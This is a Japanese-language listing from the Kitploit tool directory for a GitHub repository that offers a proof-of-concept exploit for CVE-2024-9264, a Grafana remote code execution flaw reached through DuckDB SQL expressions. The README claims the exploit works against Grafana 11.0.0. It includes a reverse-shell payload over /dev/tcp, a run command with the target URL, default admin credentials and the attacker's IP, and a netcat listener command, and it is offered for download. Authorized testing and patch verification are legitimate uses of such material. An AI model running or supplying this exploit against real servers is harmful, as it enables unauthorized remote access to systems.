Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9264-Fixed — CVE-2024-9264 用の修正された概念実証エクスプロイト。DuckDB SQL 式を介した重大な Grafana RCE。修正された shellfs 拡張機能と writefile() 関数を使用してリバースシェルを実行します。 | Kitploit
ツール/GitHubGitHub/exerrdev/cve-2024-9264-fixed
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールペイロード開発
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

CVE-2024-9264 用の修正された概念実証エクスプロイト。DuckDB SQL 式を介した重大な Grafana RCE。修正された shellfs 拡張機能と writefile() 関数を使用してリバースシェルを実行します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛠️ CVE-2024-9264 - 修正版 Grafana RCE エクスプロイト

これは、CVE-2024-9264(Grafanaにおける重大なリモートコード実行脆弱性、SQL式とDuckDB経由)の概念実証エクスプロイトの修正版です。

🔗 元のアドバイザリ: Grafana Security Release
❌ 元のPoC: 構文エラーと write_file() の誤った使用により破損
✅ このバージョンは動作します。脆弱なGrafana 11.0.0インスタンスでテスト済みです。


✅ このバージョンの修正点

  • ✅ 正しく writefile() を使用(write_file() の代わり)(DuckDB関数)
  • ✅ bash -i >& /dev/tcp/... を使用した適切なシェルペイロード
  • ✅ shellfs 拡張機能を介してリバースシェルが正常に書き込まれ、実行されました

📦 必要条件

  • 以下のGrafanaインスタンス:
    • DuckDBバックエンド
    • install shellfs from community を実行できること
  • 攻撃マシン上のnetcatリスナー

🚀 使用方法

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

その後、以下でリッスン:

root@kitploit:~
nc -lvnp 4444

⚠️ 法的免責事項

このプロジェクトは教育目的のみです。
テストする許可がないターゲットに対して使用しないでください。


✍️ この修正の作成者

修正・検証: Exerr — 元のPoC: z3k0sec。

ツールをダウンロード